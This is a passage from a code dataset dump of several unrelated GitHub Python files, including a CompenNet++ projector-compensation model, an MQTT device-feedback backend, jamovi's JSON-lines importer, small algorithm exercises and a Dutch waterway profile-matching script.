1\")\n plt.ylabel(\"feature 2\")\n plt.title('Perceptron Algorithm')\n plt.plot(x1, x2, 'y-')\n plt.show()\n\nw = perceptron(X, y, 0.5, 100)\nplot_decision_boundary(X, w)","repo_name":"SemahChaouch/dltp","sub_path":"tp1.py","file_name":"tp1.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894379681","text":"'''\nCompenNet++ CNN model\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pytorch_tps\nimport copy\n\n\n# CompenNet\nclass CompenNet(nn.Module):\n def __init__(self):\n super(CompenNet, self).__init__()\n self.name = 'CompenNet'\n self.relu = nn.ReLU()\n\n # backbone branch\n self.conv1 = nn.Conv2d(3, 32, 3, 2, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 2, 1)\n self.conv3 = nn.Conv2d(64, 128, 3, 1, 1)\n self.conv4 = nn.Conv2d(128, 256, 3, 1, 1)\n self.conv5 = nn.Conv2d(256, 128, 3, 1, 1)\n\n # surface image feature extraction branch\n self.conv1_s = nn.Conv2d(3, 32, 3, 2, 1)\n self.conv2_s = nn.Conv2d(32, 64, 3, 2, 1)\n self.conv3_s = nn.Conv2d(64, 128, 3, 1, 1)\n self.conv4_s = nn.Conv2d(128, 256, 3, 1, 1)\n\n # transposed conv\n self.transConv1 = nn.ConvTranspose2d(128, 64, 2, 2, 0)\n self.transConv2 = nn.ConvTranspose2d(64, 32, 2, 2, 0)\n self.conv6 = nn.Conv2d(32, 3, 3, 1, 1)\n\n # skip layers\n self.skipConv1 = nn.Sequential(\n nn.Conv2d(3, 3, 3, 1, 1),\n self.relu,\n nn.Conv2d(3, 3, 3, 1, 1),\n self.relu,\n nn.Conv2d(3, 3, 3, 1, 1),\n self.relu\n )\n\n self.skipConv2 = nn.Conv2d(32, 64, 1, 1, 0)\n self.skipConv3 = nn.Conv2d(64, 128, 1, 1, 0)\n\n # stores biases of surface feature branch (net simplification)\n self.register_buffer('res1_s', None)\n self.register_buffer('res2_s', None)\n self.register_buffer('res3_s', None)\n self.register_buffer('res4_s', None)\n\n # initialization function, first checks the module type,\n def _initialize_weights(m):\n if type(m) == nn.Conv2d:\n nn.init.kaiming_normal_(m.weight)\n\n self.apply(_initialize_weights)\n\n # simplify trained model by trimming surface branch to biases\n def simplify(self, s):\n self.res1_s = self.relu(self.conv1_s(s))\n self.res2_s = self.relu(self.conv2_s(self.res1_s))\n self.res3_s = self.relu(self.conv3_s(self.res2_s))\n self.res4_s = self.relu(self.conv4_s(self.res3_s))\n\n self.res1_s = self.res1_s.squeeze()\n self.res2_s = self.res2_s.squeeze()\n self.res3_s = self.res3_s.squeeze()\n self.res4_s = self.res4_s.squeeze()\n\n # x is the input uncompensated image, s is a 1x3x256x256 surface image\n def forward(self, x, s):\n # surface feature extraction\n res1_s = self.relu(self.conv1_s(s)) if self.res1_s is None else self.res1_s\n res2_s = self.relu(self.conv2_s(res1_s)) if self.res2_s is None else self.res2_s\n res3_s = self.relu(self.conv3_s(res2_s)) if self.res3_s is None else self.res3_s\n res4_s = self.relu(self.conv4_s(res3_s)) if self.res4_s is None else self.res4_s\n\n # backbone\n res1 = self.skipConv1(x)\n x = self.relu(self.conv1(x) + res1_s)\n res2 = self.skipConv2(x)\n x = self.relu(self.conv2(x) + res2_s)\n res3 = self.skipConv3(x)\n x = self.relu(self.conv3(x) + res3_s)\n x = self.relu(self.conv4(x) + res4_s)\n x = self.relu(self.conv5(x) + res3)\n x = self.relu(self.transConv1(x) + res2)\n x = self.relu(self.transConv2(x))\n x = torch.clamp(self.relu(self.conv6(x) + res1), max=1)\n\n return x\n\n\n# WarpingNet\nclass WarpingNet(nn.Module):\n def __init__(self, grid_shape=(6, 6), out_size=(256, 256), with_refine=True):\n super(WarpingNet, self).__init__()\n self.grid_shape = grid_shape\n self.out_size = out_size\n self.with_refine = with_refine # becomes WarpingNet w/o refine if set to false\n self.name = 'WarpingNet' if not with_refine else 'WarpingNet_without_refine'\n\n # relu\n self.relu = nn.ReLU()\n self.leakyRelu = nn.LeakyReLU(0.1)\n\n # final refined grid\n self.register_buffer('fine_grid', None)\n\n # affine params\n self.affine_mat = nn.Parameter(torch.Tensor([1, 0, 0, 0, 1, 0]).view(-1, 2, 3))\n\n # tps params\n self.nctrl = self.grid_shape[0] * self.grid_shape[1]\n self.nparam = (self.nctrl + 2)\n ctrl_pts = pytorch_tps.uniform_grid(grid_shape)\n self.register_buffer('ctrl_pts', ctrl_pts.view(-1, 2))\n self.theta = nn.Parameter(torch.ones((1, self.nparam * 2), dtype=torch.float32).view(-1, self.nparam, 2) * 1e-3)\n\n # initialization function, first checks the module type,\n def init_normal(m):\n if type(m) == nn.Conv2d:\n nn.init.normal_(m.weight, 0, 1e-4)\n\n # grid refinement net\n if self.with_refine:\n self.grid_refine_net = nn.Sequential(\n nn.Conv2d(2, 32, 3, 2, 1),\n self.relu,\n nn.Conv2d(32, 64, 3, 2, 1),\n self.relu,\n nn.ConvTranspose2d(64, 32, 2, 2, 0),\n self.relu,\n nn.ConvTranspose2d(32, 2, 2, 2, 0),\n self.leakyRelu\n )\n self.grid_refine_net.apply(init_normal)\n else:\n self.grid_refine_net = None # WarpingNet w/o refine\n\n # initialize WarpingNet's affine matrix to the input affine_vec\n def set_affine(self, affine_vec):\n self.affine_mat.data = torch.Tensor(affine_vec).view(-1, 2, 3)\n\n # simplify trained model to a single sampling grid for faster testing\n def simplify(self, x):\n # generate coarse affine and TPS grids\n coarse_affine_grid = F.affine_grid(self.affine_mat, torch.Size([1, x.shape[1], x.shape[2], x.shape[3]])).permute((0, 3, 1, 2))\n coarse_tps_grid = pytorch_tps.tps_grid(self.theta, self.ctrl_pts, (1, x.size()[1]) + self.out_size)\n\n # use TPS grid to sample affine grid\n tps_grid = F.grid_sample(coarse_affine_grid, coarse_tps_grid)\n\n # refine TPS grid using grid refinement net and save it to self.fine_grid\n if self.with_refine:\n self.fine_grid = torch.clamp(self.grid_refine_net(tps_grid) + tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n else:\n self.fine_grid = torch.clamp(tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n\n def forward(self, x):\n\n if self.fine_grid is None:\n # not simplified (training/validation)\n # generate coarse affine and TPS grids\n coarse_affine_grid = F.affine_grid(self.affine_mat, torch.Size([1, x.shape[1], x.shape[2], x.shape[3]])).permute((0, 3, 1, 2))\n coarse_tps_grid = pytorch_tps.tps_grid(self.theta, self.ctrl_pts, (1, x.size()[1]) + self.out_size)\n\n # use TPS grid to sample affine grid\n tps_grid = F.grid_sample(coarse_affine_grid, coarse_tps_grid).repeat(x.shape[0], 1, 1, 1)\n\n # refine TPS grid using grid refinement net and save it to self.fine_grid\n if self.with_refine:\n fine_grid = torch.clamp(self.grid_refine_net(tps_grid) + tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n else:\n fine_grid = torch.clamp(tps_grid, min=-1, max=1).permute((0, 2, 3, 1))\n else:\n # simplified (testing)\n fine_grid = self.fine_grid.repeat(x.shape[0], 1, 1, 1)\n\n # warp\n x = F.grid_sample(x, fine_grid)\n return x\n\n\n# CompenNet++\nclass CompenNetPlusplus(nn.Module):\n def __init__(self, warping_net=None, compen_net=None):\n super(CompenNetPlusplus, self).__init__()\n self.name = 'CompenNetPlusplus'\n\n # initialize from existing models or create new models\n self.warping_net = copy.deepcopy(warping_net.module) if warping_net is not None else WarpingNet()\n self.compen_net = copy.deepcopy(compen_net.module) if compen_net is not None else CompenNet()\n\n # simplify trained model to a single sampling grid for faster testing\n def simplify(self, s):\n self.warping_net.simplify(s)\n self.compen_net.simplify(self.warping_net(s))\n\n # s is Bx3x256x256 surface image\n def forward(self, x, s):\n # geometric correction using WarpingNet (both x and s)\n x = self.warping_net(x)\n s = self.warping_net(s)\n\n # photometric compensation using CompenNet\n x = self.compen_net(x, s)\n\n return x\n","repo_name":"BingyaoHuang/CompenNet-plusplus","sub_path":"src/python/CompenNetPlusplusModel.py","file_name":"CompenNetPlusplusModel.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"46401430771","text":"# MQTT backend feedback device status update script\n# Process feedback changes and change requests and relays updates to corresponding devices\n\nimport backendAPI as api # API module to access and interface with our projects MQTT and MongoDB server\n\n# Message format from website \"apikey:Node_Name:Device_name:value type:Value\"\n# From device Feedback/Apikey/Node_name/Device_name/Value_type \"Value\"\n\n# Connection Fields\nCONNECTION_STRING = \"mongodb://192.168.1.48:27017\"\nBROKER_ADDRESS = \"192.168.1.15\"\nSUB_TOPIC = \"Feedback/#\"\nDEVICE_RECEIVE_TOPIC_HEADER = \"Feedback_receive\"\n\n\n# Function call when a message is received\ndef on_message(client, userdata, message):\n print(\"\\nMessage on Topic:\", message.topic, \" QoS:\", message.qos)\n data_string = str(message.payload.decode(\"utf-8\")).lower()\n print(\"Data:\", data_string, \"\\n\")\n topic_list = api.parse_topic(message.topic)\n msg_list = api.parse_msg(data_string)\n\n if topic_list[1].lower() == \"website\": # Process feedback change request from website\n if update_db_feedback_device(db, msg_list[0], msg_list[1], msg_list[2], msg_list[3], msg_list[4]):\n api.publish(client, api.construct_topic(\n [DEVICE_RECEIVE_TOPIC_HEADER, msg_list[0], msg_list[1], msg_list[2], msg_list[3]]), msg_list[4], 1)\n elif len(topic_list) == 5: # Process feedback change from device\n if not api.check_user_data(db, \"user_data\", topic_list[1]):\n print(\"Invalid API Key\")\n topic_list[0] = DEVICE_RECEIVE_TOPIC_HEADER\n api.publish(client, api.construct_topic(topic_list), \"ERROR: bad_api_key\", 1)\n elif not update_db_feedback_device(db, topic_list[1], topic_list[2], topic_list[3], topic_list[4],\n data_string):\n topic_list[0] = DEVICE_RECEIVE_TOPIC_HEADER\n api.publish(client, api.construct_topic(topic_list), \"Error: Failed to update feedback device!\", 1)\n else:\n print(\"Invalid topic received, message ignored!\")\n return 0\n\n\n# Updates the database with feedback change requests\ndef update_db_feedback_device(database, api_key, node_name, device_name, data_type, data):\n collection_name = api_key + \"_feedback\"\n if collection_name not in database.list_collection_names():\n print(\"Database Error: User collection not found!\")\n return False\n else:\n feedback_collection = database[collection_name]\n feedback_document = feedback_collection.find_one(\n {\"node_name\": node_name, \"device_name\": device_name, \"data_type\": data_type})\n if feedback_document is None:\n print(\"Error: Device does not exist in database!\")\n return False\n\n if data_type.lower() == \"switch\" and (data.lower() == \"on\" or data.lower() == \"off\"):\n feedback_collection.update_one({\"_id\": feedback_document[\"_id\"]}, {\"$set\": {\"data\": data.lower()}})\n return True\n elif data_type.lower() == \"value\":\n try:\n value = int(data)\n feedback_collection.update_one({\"_id\": feedback_document[\"_id\"]}, {\"$set\": {\"data\": value}})\n return True\n except:\n print(\"Could not convert expected value type data to int!\")\n return False\n else:\n print(\"Invalid data type or data!\")\n return False\n\n\n# Script Start #\ndb = api.connect_to_database(CONNECTION_STRING, \"iospace\")\n\nmqtt_client = api.connect_to_broker(BROKER_ADDRESS, \"feedback\", on_message)\napi.subscribe(mqtt_client, SUB_TOPIC, 1)\n\napi.forever_mqtt_thread(mqtt_client)\n","repo_name":"robotevan/3010_IO_SPACE","sub_path":"TeamProject/MQTTBackend/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20635790323","text":"import sys; sys.stdin = open('6026.txt')\nfrom math import factorial\nfor t_case in range(int(input())):\n M, N = map(int, input().split())\n # all \n init = M ** N\n # S(n ,k) * k! == answer\n\n tmp = ((M**N) - M) // 2 ** factorial(M)\n print('#{} {}'.format(t_case+1, tmp))","repo_name":"dodonmountain/algorithm","sub_path":"2019_late/20190927/swea_6026_성수의비밀번호공격.py","file_name":"swea_6026_성수의비밀번호공격.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37795518153","text":"import torch\n\nSEED = 1 # A seed for the random number generator\n\n# Graph\nNR_NODES = 10 # Number of nodes N\nEMBEDDING_DIMENSIONS = 5 # Embedding dimension D\nEMBEDDING_ITERATIONS_T = 1 # Number of embedding iterations T\n\n# Learning\nNR_EPISODES = 4001\nMEMORY_CAPACITY = 10000\nN_STEP_QL = 2 # Number of steps (n) in n-step Q-learning to wait before computing target reward estimate\nBATCH_SIZE = 16\n\nGAMMA = 0.9\nINIT_LR = 5e-3\nLR_DECAY_RATE = 1. - 2e-5 # learning rate decay\n\nMIN_EPSILON = 0.1\nEPSILON_DECAY_RATE = 6e-4 # epsilon decay\n\nFOLDER_NAME = './models' # where to checkpoint the best models\n\nDEVICE = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n","repo_name":"rodrigohaddad/ML-Combinatorial-Optimization","sub_path":"first_attempt/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36279609064","text":"def solution(url: str, true_length: int) -> str: \n url = list(url) # In python, string doesn't support index manipulation. \n \n # replace a single space with \"%20\"\n spaces = len(''.join(url).split()) - 1 # find the number of spaces in the url\n idx = true_length + spaces * 2\n for i in range(true_length - 1, -1, -1): \n if url[i] == ' ': \n url[idx-3:idx] = ['%', '2', '0']\n idx -= 3\n else: \n url[idx - 1] = url[i]\n idx -= 1\n return ''.join(url) # in-place, but return it to print\n\nif __name__ == '__main__': \n print(solution(\"Mr John Smith \", 13))\n","repo_name":"yehogwon/algo-study","sub_path":"cracking-the-coding-interview/CH01/urlify/urlify.py","file_name":"urlify.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18743786895","text":"\nimport re\nimport json\nimport chardet\nimport os\nimport math\n\nfrom io import TextIOWrapper\nfrom json.decoder import JSONDecodeError\n\nfrom jamovi.core import ColumnType\nfrom jamovi.core import DataType\nfrom jamovi.core import MeasureType\n\nfrom .reader import Reader\n\n\ndef calc_dps(value, max_dp=3):\n if math.isnan(value):\n return 0\n if not math.isfinite(value):\n return 0\n\n max_dp_required = 0\n value %= 1\n as_string = '{v:.{dp}f}'.format(v=value, dp=max_dp)\n as_string = as_string[2:]\n\n for dp in range(max_dp, 0, -1):\n index = dp - 1\n if as_string[index] != '0':\n max_dp_required = dp\n break\n\n return max_dp_required\n\n\nclass ColumnInfo:\n\n def __init__(self):\n self.only_integers = True\n self.only_floats = True\n self.is_empty = True\n self.unique_values = set()\n self.n_uniques = 0\n self.many_uniques = False\n self.measure_type = None\n self.data_type = None\n self.levels = None\n self.ruminated = False\n self.dps = 0\n\n def examine(self, value):\n if value is None or (isinstance(value, str) and value.strip() == ''):\n return\n self.is_empty = False\n if isinstance(value, list) or isinstance(value, dict) or isinstance(value, bool):\n value = json.dumps(value)\n if not self.many_uniques:\n try:\n v = int(value)\n except ValueError:\n v = value\n if v not in self.unique_values:\n self.unique_values.add(v)\n self.n_uniques += 1\n if self.n_uniques > 49:\n self.many_uniques = True\n self.unique_values = None\n if isinstance(value, int):\n if value > 2147483647 or value < -2147483648:\n self.only_integers = False\n else:\n if isinstance(value, float):\n self.only_integers = False\n self.dps = max(self.dps, calc_dps(value))\n else:\n self.only_integers = False\n self.only_floats = False\n\n def ruminate(self):\n if self.only_integers:\n if self.many_uniques is False:\n self.data_type = DataType.INTEGER\n self.measure_type = MeasureType.NOMINAL\n if self.unique_values is not None:\n if any(map(lambda x: isinstance(x, str), self.unique_values)):\n uniques = list(set(map(lambda x: str(x), self.unique_values)))\n else:\n uniques = list(self.unique_values)\n uniques.sort()\n self.levels = list(map(lambda v: (v, str(v), str(v), True), uniques))\n else:\n self.data_type = DataType.INTEGER\n self.measure_type = MeasureType.CONTINUOUS\n else:\n if self.only_floats:\n self.data_type = DataType.DECIMAL\n self.measure_type = MeasureType.CONTINUOUS\n else:\n if self.many_uniques is False:\n self.data_type = DataType.TEXT\n self.measure_type = MeasureType.NOMINAL\n if self.unique_values is not None:\n if any(map(lambda x: isinstance(x, str), self.unique_values)):\n uniques = list(set(map(lambda x: str(x), self.unique_values)))\n else:\n uniques = list(self.unique_values)\n uniques.sort()\n self.levels = list(map(lambda v: (v[0], str(v[1]), str(v[1]), False), enumerate(uniques)))\n else:\n self.data_type = DataType.TEXT\n self.measure_type = MeasureType.ID\n self.ruminated = True\n\n\nclass JSONLinesReader(Reader):\n\n @staticmethod\n def is_this_json(path):\n\n if path[-4:].lower() == '.csv':\n return False\n\n with open(path, mode='rb') as file:\n byts = file.read(4096)\n det = chardet.detect(byts)\n encoding = det['encoding']\n file.seek(0)\n if encoding == 'ascii':\n encoding = 'utf-8-sig'\n text_stream = TextIOWrapper(file, encoding=encoding, errors='replace')\n while True:\n line = text_stream.readline()\n if line == '': # EOF\n break\n sline = line.strip()\n if sline != '': # skip empty lines\n try:\n v = json.loads(sline)\n if isinstance(v, list) or isinstance(v, dict):\n return True\n else:\n return False\n except JSONDecodeError:\n return False\n return False\n\n def __init__(self, settings):\n super().__init__(settings)\n self._file = None\n self._text_stream = None\n\n def open(self, path):\n self.set_total(os.stat(path).st_size)\n try:\n self._file = open(path, mode='rb')\n byts = self._file.read(4096)\n det = chardet.detect(byts)\n encoding = det['encoding']\n self._file.seek(0)\n if encoding == 'ascii':\n encoding = 'utf-8-sig'\n self._text_stream = TextIOWrapper((self._file), encoding=encoding, errors='replace')\n except Exception as e:\n if self._file:\n self._file.close()\n raise e\n\n def lines(self):\n while True:\n line = self._text_stream.readline()\n if line == '':\n break\n yield line\n\n def rows(self, line):\n entry = json.loads(line)\n if isinstance(entry, dict):\n yield entry\n elif isinstance(entry, list):\n for row in entry:\n yield row\n else:\n raise ValueError\n\n def read_into(self, data, path, prog_cb):\n\n self.open(path)\n infos = {}\n row_count = 0\n line_count = 0\n\n for line in self.lines():\n for row in self.rows(line):\n for column_name, value in row.items():\n try:\n info = infos[column_name]\n except KeyError:\n infos[column_name] = info = ColumnInfo()\n info.examine(value)\n\n row_count += 1\n if row_count % 100 == 0:\n prog_cb(0.33333 * self.progress() / self._total)\n line_count += 1\n\n source_column = None\n if line_count > 1:\n source_column = data.append_column('entry', 'entry')\n source_column.column_type = ColumnType.DATA\n source_column.set_data_type(DataType.INTEGER)\n if line_count > 50:\n source_column.set_measure_type(MeasureType.ID)\n else:\n source_column.set_measure_type(MeasureType.NOMINAL)\n\n for column_name, info in infos.items():\n info.ruminate()\n column = data.append_column(column_name, column_name)\n column.column_type = ColumnType.DATA\n column.set_data_type(info.data_type)\n column.set_measure_type(info.measure_type)\n column.dps = info.dps\n if info.levels:\n for level in info.levels:\n column.append_level(level[0], level[1], level[2])\n\n data.set_row_count(row_count)\n\n self.close()\n self.open(path)\n\n row_no = 0\n columns_by_name = dict(map(lambda c: (c.name, c), data))\n\n for line_no, line in enumerate(self.lines()):\n for row in self.rows(line):\n\n if source_column:\n source_column.set_value(row_no, line_no+1)\n\n for column_name, value in row.items():\n\n column = columns_by_name[column_name]\n\n if value is None or (isinstance(value, str) and value.strip() == ''):\n column.clear_at(row_no)\n elif column.data_type == DataType.INTEGER:\n column.set_value(row_no, value)\n elif column.data_type == DataType.DECIMAL:\n column.set_value(row_no, value)\n elif type(value) in (dict, list, bool):\n column.set_value(row_no, json.dumps(value))\n else:\n value = str(value).strip()\n if value == '':\n column.clear_at(row_no)\n else:\n column.set_value(row_no, str(value))\n\n row_no += 1\n if row_no % 100 == 0:\n prog_cb(.33333 + .66666 * row_no / row_count)\n\n\n def progress(self):\n return self._file.tell()\n\n def __iter__(self):\n self._text_stream.seek(0)\n\n def close(self):\n try:\n self._file.close()\n except Exception:\n pass\n","repo_name":"jamovi/jamovi","sub_path":"server/jamovi/server/formatio/jsonlines.py","file_name":"jsonlines.py","file_ext":"py","file_size_in_byte":9206,"program_lang":"python","lang":"en","doc_type":"code","stars":481,"dataset":"github-code","pt":"54"} +{"seq_id":"21274565732","text":"# profile_matcha.py\r\n# onderdeel van leggertool\r\n# plaatst theoretische profielen zo goed mogelijk binnen gemeten profielen\r\n\r\n# variant a) database structuur 20180129\r\n\r\nimport logging\r\nimport matplotlib\r\nimport os\r\n\r\nmatplotlib.use('AGG')\r\n\r\nimport sqlite3\r\nimport matplotlib.pyplot as plt\r\nimport shapely\r\nimport shapely.geometry\r\nfrom shapely.errors import TopologicalError\r\n# from descartes import PolygonPatch\r\nfrom matplotlib.pyplot import savefig\r\n\r\ntry:\r\n from legger.sql_models.legger_database import load_spatialite\r\nexcept ImportError:\r\n from sql_models.legger_database import load_spatialite\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef mk_pro_x_hy_kompas(cur, straal=0.5, aantalstappen=90, srid=28992):\r\n \"\"\" Voor alle gemeten profielen wordt het snijpunt met het bijbehorende hydroobject gemaakt en het azimut\r\n (kompasrichting) van het hydroobject ter plekke.\r\n Invoer: cur = een cursor naar de database met gemetenprofielen, hydroobjecten en theoretische profielen\r\n straal = de straal van een semi-cirkel met als middelpunt het snijpunt van gemetenprofiel en hydroobject\r\n aantalstappen = het aantal lijnstukken van de semi-cirkel\r\n srid = het nummer van het geografische referentiestelsel; 28992 = Rijksdriehoekmeting\r\n Uitvoer: gevulde tabel pro_x_hy_kompas in de database\r\n\r\n Op de loodlijn op het lijnstuk van het hydroobject ter plekke van het snijpunt, worden later het gemeten\r\n profiel en de theoretische profielen geprojecteerd.\r\n Het snijpunt met de kompasrichting wordt opgeslagen in tabel pro_x_hy_kompas in de database.\r\n\r\n Het snijpunt wordt bepaald met de spatialite functie Intersection(profiellijn,hydroobject)\r\n De kommpasrichting wordt bepaald met de spatialite functie Azimuth(punt1,punt2)\r\n punt1 en punt2 worden bepaald door Intersection(profiellijn, cirkeltje_om_snijpunt)\r\n cirkeltje_om_snijpunt wordt gemaakt door Buffer(snijpunt, straal, aantalstappen)\r\n straal is een variabele evenals aantal stappen\"\"\"\r\n\r\n cur.execute('drop table if exists pro_x_hy_kompas')\r\n cur.execute('create table pro_x_hy_kompas (pro_id bigint primary key, ovk_ovk_id bigint, kompas float,'\r\n 'CONSTRAINT fk_pro FOREIGN KEY (pro_id) REFERENCES pro(pro_id), '\r\n 'CONSTRAINT fk_hy FOREIGN KEY (ovk_ovk_id) REFERENCES hydroobject(id)) ')\r\n cur.execute('select DiscardGeometryColumn(\"pro_x_hy_kompas\",\"geometry\")')\r\n cur.execute('select AddGeometryColumn(\"pro_x_hy_kompas\", \"geometry\", %d, \"POINT\")' % srid)\r\n cur.execute('insert into pro_x_hy_kompas (pro_id, ovk_ovk_id, geometry, kompas)'\r\n ' select pro_id, ovk_ovk_id, Intersection(pro.GEOMETRY, hydroobject.GEOMETRY),'\r\n 'Azimuth('\r\n 'PointN(Intersection(pro.GEOMETRY,Buffer(Intersection(pro.GEOMETRY, hydroobject.GEOMETRY),%f,%d)),1), '\r\n 'PointN(Intersection(pro.GEOMETRY,Buffer(Intersection(pro.GEOMETRY, hydroobject.GEOMETRY),%f,%d)),2)) '\r\n 'from pro inner join hydroobject on '\r\n '(pro.ovk_ovk_id=hydroobject.id)' % (straal, aantalstappen, straal, aantalstappen))\r\n return\r\n\r\n\r\ndef peilperprofiel(cur, peilcriterium=\"min\", debug=0):\r\n \"\"\" Haal per gemeten profiel het heersende peil op.\r\n Invoer: cur = een cursor naar de database met gemetenprofielen, hydroobjecten en theoretische profielen\r\n peilcriterium = vlag met waarden min of max om resp.de minimale of maximale waterhoogte te kiezen\r\n Uitvoer: een dictionary met als sleutel het id van het profiel en als waarden het id van het hydroobject en peil\r\n\r\n In versie 0 wordt domweg op grond van de administratieve joins de waterhoogte uit de tabel streefpeilen gebruikt\r\n Dit kan later zo nodig verfijnt worden met een spatial join\r\n In het testgebied Geestmerambacht levert de gebruikte query 43 null waarden op voor waterhoogte\r\n steekproeven geven aan dat dit vooral komt doordat profielen geselecteerd zijn met een buffer\r\n rond het gebied\r\n\r\n IS NIET MEER NODIG\r\n \"\"\"\r\n if peilcriterium != 'min' and peilcriterium != 'max':\r\n peilcriterium = 'min'\r\n # logger.debug(\"PEILCRITERIUM AANGEPAST NAAR %s\", peilcriterium)\r\n\r\n q = '''select pro.pro_id, pro.ovk_ovk_id, %s(streefpeil.waterhoogte) from \r\n pro left outer join hydroobject on (pro.ovk_ovk_id = hydroobject.id) \r\n left outer join peilgebiedpraktijk on (hydroobject.ws_in_peilgebied = peilgebiedpraktijk.code) \r\n left outer join streefpeil on (peilgebiedpraktijk.id=streefpeil.peilgebiedpraktijkid)\r\n group by pro.pro_id, pro.ovk_ovk_id\r\n ''' % peilcriterium\r\n prof = {}\r\n for r in cur.execute(q):\r\n prof[r[0]] = (r[1], r[2])\r\n q = '''insert into hyob_voorkeurpeil select hydroobject.id, %s(streefpeil.waterhoogte) from \r\n hydroobject left outer join peilgebiedpraktijk on (hydroobject.ws_in_peilgebied = peilgebiedpraktijk.code) \r\n left outer join streefpeil on (peilgebiedpraktijk.id=streefpeil.peilgebiedpraktijkid)\r\n group by hydroobject.id''' % peilcriterium\r\n cur.execute(q)\r\n # logger.debug(\"aantal gemeten profielen in een hydro_object met een peil: %d \", len(prof))\r\n\r\n return prof\r\n\r\n\r\ndef haal_meetprofielen1(cur, profielsoort=\"Z1\", filter_profiel_id=None):\r\n \"\"\" Haal de gemeten profieelpunten op uit de database voor de profielsoort vastebodem (Z1)\r\n Invoer: cur = een cursor naar de database met gemetenprofielen, hydroobjecten en theoretische profielen\r\n profielsoort = de code voor de harde bodem\r\n peilcriterium = vlag met waarden min of max om resp.de minimale of maximale waterhoogte te kiezen\r\n Uitvoer: een dictionary met als sleutel de profielids van gemeten profielen\r\n met per profielid:\r\n het hydroid (hydro object id)\r\n het peil\r\n de punten van het gemeten profiel + extra begin- en eindpunt 100m hoger \"\"\"\r\n prof = {}\r\n\r\n q = 'select profielen.pro_id, profielen.proident, hydroobject.id, hydroobject.streefpeil from profielen inner join hydroobject ' \\\r\n 'on (profielen.hydro_id=hydroobject.id) WHERE hydroobject.streefpeil IS NOT NULL '\r\n if filter_profiel_id is not None:\r\n q += ' WHERE profielen.id = %d' % filter_profiel_id\r\n\r\n q_punten = '''select pl.pro_id, pp.iws_volgnr, X(pp.GEOMETRY), Y(pp.GEOMETRY), pp.iws_hoogte, pl.hydro_id\r\n from profielen as pl inner join profielpunten as pp on (pl.pro_id = pp.pro_pro_id)\r\n where pl.pro_id = %d and pp.osmomsch = \"%s\" \r\n order by pp.iws_volgnr'''\r\n cur.execute(q)\r\n\r\n for proid, proident, hydro_id, streefpeil in list(cur.fetchall()):\r\n prof[proid] = {} # Er kunnen meerdere gemeten profielen per hydrovak zijn.\r\n prof[proid]['hydroid'] = hydro_id\r\n prof[proid]['peil'] = streefpeil\r\n prof[proid]['proident'] = proident\r\n prof[proid][\"orig\"] = []\r\n\r\n cur.execute(q_punten % (proid, profielsoort))\r\n for r in cur.fetchall():\r\n prof[proid][\"orig\"].append([r[2], r[3], r[4], r[5]])\r\n\r\n if len(prof[proid][\"orig\"]) > 0:\r\n # eerste en laatste punt 1000 meter hoger\r\n prof[proid][\"orig\"][0][2] = max(prof[proid][\"orig\"][0][2], streefpeil) + 1000.0\r\n prof[proid][\"orig\"][-1][2] = max(prof[proid][\"orig\"][-1][2], streefpeil) + 1000.0\r\n\r\n # Verrijk profielen met de projectie op een rechte lijn\r\n # prof verrijkt met de key \"proj\" met daarin een list van lists van afstand-geprojecteerd,\r\n # x-geprojecteerd, y-geprojecteerd en diepte\r\n lijn = shapely.geometry.LineString([(prof[proid]['orig'][0][0], prof[proid]['orig'][0][1]),\r\n (prof[proid]['orig'][-1][0], prof[proid]['orig'][-1][1])])\r\n prof[proid]['proj'] = []\r\n for p in prof[proid]['orig']:\r\n afstand = lijn.project(shapely.geometry.Point((p[0], p[1])))\r\n pr = lijn.interpolate(afstand)\r\n prof[proid]['proj'].append([afstand, pr.x, pr.y, p[2], p[3]])\r\n\r\n return prof\r\n\r\n\r\ndef interpoleerafstand(l, r, p):\r\n \"\"\"interpoleer de afstand op grond van de hoogtes\r\n Invoer: l = linker list met afstand, x, y en z\r\n r = rechter list met [a, x, y, z]\r\n p = z waarde tussen l[3] en r[3] in\r\n\r\n Uitvoer: tuple van afstand a en hoogte z\r\n \"\"\"\r\n factor = (p - l[3]) / (r[3] - l[3])\r\n return l[0] + factor * (r[0] - l[0]), p\r\n\r\n\r\ndef verrijkgemprof(cur, prof):\r\n \"\"\"Verrijk de tabel profielpunten met de afstanden zoals die in projecteerprofielen berekend zijn\"\"\"\r\n q = 'update profielpunten set afstand = %f where OGC_FID= %d'\r\n for proid in prof:\r\n for p in prof[proid]['proj']:\r\n if p[4] != 0:\r\n cur.execute(q % (p[0], p[4]))\r\n return\r\n\r\n\r\ndef mkmogelijktheoprofiel(talud, waterdiepte, bodembreedte, peil):\r\n \"\"\"Maak een shapely polygoon van het theoretisch profiel \"\"\"\r\n return shapely.geometry.Polygon([(0, peil), (talud * waterdiepte, peil - waterdiepte),\r\n (talud * waterdiepte + bodembreedte, peil - waterdiepte),\r\n (talud * waterdiepte + bodembreedte + talud * waterdiepte, peil)])\r\n\r\n\r\ndef mkrechthoekondertheoprofiel(rhlb, rhrb):\r\n \"\"\"Maak een shapely polygoon van een rechthoek onder het theoretisch profiel\"\"\"\r\n return shapely.geometry.Polygon([rhlb, (rhlb[0], rhlb[1] - 1000.0), (rhrb[0], rhrb[1] - 1000.0), rhrb])\r\n\r\n\r\ndef 